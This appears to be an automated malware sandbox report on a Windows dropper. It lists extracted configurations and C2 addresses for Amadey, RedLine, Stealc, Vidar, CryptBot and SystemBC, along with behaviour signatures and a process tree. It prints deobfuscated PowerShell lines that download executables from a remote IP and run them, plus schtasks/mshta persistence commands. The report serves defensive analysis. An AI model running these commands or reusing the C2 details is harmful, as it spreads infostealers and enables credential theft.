Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20/02/2025, 00:32 UTC

General

  • Target

    5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe

  • Size

    938KB

  • MD5

    a395184a62ce20f7505664209dfc9b6d

  • SHA1

    fe2ae192812df97e9a24b41fd1b045e8cb8e2c90

  • SHA256

    5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201

  • SHA512

    ddbd56812b6839c3a4e7a360de9a0a5acb5f4f4f5676cb7f9f544131684d64d9c306b78781ce2b8ba511ad7aa88c43ae34c69fa0c0f936303400970e39476b10

  • SSDEEP

    24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8ayTF:KTvC/MTQYxsWR7ayT

Malware Config

Extracted

Language
ps1
Deobfuscated

    $d = $env:temp + "PWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE"
    (new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
    start-process $d

URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated

    $d = $env:temp + "CVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE"
    (new-object system.net.webclient).downloadfile("http://185.215.113.16/defend/random.exe", $d)
    start-process $d

URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated

    $d = $env:temp + "\\483d2fa8a0d53818306efeb32d3.exe"
    (new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
    start-process $d

URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated

    $d = $env:temp + "VTMZEVGJD6GVC5WRW71CZPT2AU5O57WY.EXE"
    (new-object system.net.webclient).downloadfile("http://185.215.113.16/mine/random.exe", $d)
    start-process $d

URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

    006700e5a2ab05704bbb0c589b88924d

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

cryptbot

C2

http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk17

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer, widely distributed in bundles with other software.

  • Cryptbot family
  • Detect Vidar Stealer 11 IoCs
  • Detects CryptBot payload 1 IoCs

    CryptBot is a C++ stealer, widely distributed in bundles with other software.

  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer is an antivirus-disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Runs PowerShell with the display window hidden.

  • Downloads MZ/PE file 36 IoCs
  • Uses browser remote debugging 2 TTPs 14 IoCs

    Can be used to control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 46 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 58 IoCs
  • Identifies Wine through registry keys 2 TTPs 25 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Windows directory 6 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 19 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 41 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe
    "C:\Users\Admin\AppData\Local\Temp\5f21f5677d9cdc6313895450c2c169f170db029f491311203b22281a715f1201.exe"
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3384
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn No8Yrmaizfu /tr "mshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:884
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn No8Yrmaizfu /tr "mshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2392
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\5ohpgXHlP.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3344
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1680
        • C:\Users\Admin\AppData\Local\TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE
          "C:\Users\Admin\AppData\Local\TempPWOPLEBXNAP7WZSLLCZKU8XKUNEIJTQ6.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4120
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:404
            • C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe
              "C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              PID:3364
            • C:\Users\Admin\AppData\Local\Temp\1088414001\8827e2f2e3.exe
              "C:\Users\Admin\AppData\Local\Temp\1088414001\8827e2f2e3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4600
            • C:\Users\Admin\AppData\Local\Temp\1088415101\e4c9d2bfff.exe
              "C:\Users\Admin\AppData\Local\Temp\1088415101\e4c9d2bfff.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2224
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn mMcYJmaQuvZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3648
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn mMcYJmaQuvZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:400
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\4etjqgqsj.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4360
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3352
                  • C:\Users\Admin\AppData\Local\TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE
                    "C:\Users\Admin\AppData\Local\TempCVUKSYKBKZBYUQECJTUKHNINUFUBOHIJ.EXE"
                    9⤵
                    • Modifies Windows Defender DisableAntiSpyware settings
                    • Modifies Windows Defender Real-time Protection settings
                    • Modifies Windows Defender TamperProtection settings
                    • Modifies Windows Defender notification settings
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Windows security modification
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2396
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1088416021\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4580
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1088416021\am_no.cmd" any_word
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2536
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 2
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:1948
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4544
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1336
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1976
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4620
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3344
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2868
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "fgakTma2NsJ" /tr "mshta \"C:\Temp\NcQpdvRJC.hta\"" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2176
                • C:\Windows\SysWOW64\mshta.exe
                  mshta "C:\Temp\NcQpdvRJC.hta"
                  8⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  PID:3500
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                    9⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1132
                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      10⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4604
            • C:\Users\Admin\AppData\Local\Temp\1088417001\0f807048bd.exe
              "C:\Users\Admin\AppData\Local\Temp\1088417001\0f807048bd.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3648
            • C:\Users\Admin\AppData\Local\Temp\1088418001\18b64e1917.exe
              "C:\Users\Admin\AppData\Local\Temp\1088418001\18b64e1917.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:3360
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 1520
                7⤵
                • Program crash
                PID:1680
            • C:\Users\Admin\AppData\Local\Temp\1088419001\90ced29b15.exe
              "C:\Users\Admin\AppData\Local\Temp\1088419001\90ced29b15.exe"
              6⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4104
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                7⤵
                • Uses browser remote debugging
                PID:5916
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe70f9cc40,0x7ffe70f9cc4c,0x7ffe70f9cc58
                  8⤵
                   PID:5928
              • C:\Users\Admin\AppData\Local\Temp\1088420001\40e0b6ad21.exe
                "C:\Users\Admin\AppData\Local\Temp\1088420001\40e0b6ad21.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:880
              • C:\Users\Admin\AppData\Local\Temp\1088421001\d2YQIJa.exe
                "C:\Users\Admin\AppData\Local\Temp\1088421001\d2YQIJa.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4544
              • C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe
                "C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:3952
                • C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe
                  "C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:3052
                • C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe
                  "C:\Users\Admin\AppData\Local\Temp\1088422001\f3Ypd8O.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2512
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 796
                  7⤵
                  • Program crash
                  PID:3104
              • C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe
                "C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:1948
                • C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe
                  "C:\Users\Admin\AppData\Local\Temp\1088424001\7aencsM.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  PID:4532
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    8⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:400
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffe70f9cc40,0x7ffe70f9cc4c,0x7ffe70f9cc58
                      9⤵
                       PID:432
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1808,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2
                        9⤵
                         PID:5028
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2352 /prefetch:3
                          9⤵
                           PID:1132
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2168,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2360 /prefetch:8
                            9⤵
                             PID:3404
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:4740
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:1904
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4588 /prefetch:1
                              9⤵
                              • Uses browser remote debugging
                              PID:5140
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4476 /prefetch:8
                              9⤵
                                PID:5148
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4552,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:8
                                9⤵
                                  PID:5244
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
                                  9⤵
                                    PID:5260
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5024,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4212 /prefetch:8
                                    9⤵
                                      PID:6032
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 956
                                  7⤵
                                  • Program crash
                                  PID:4200
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1088426041\tYliuwV.ps1"
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops startup file
                                • Suspicious use of AdjustPrivilegeToken
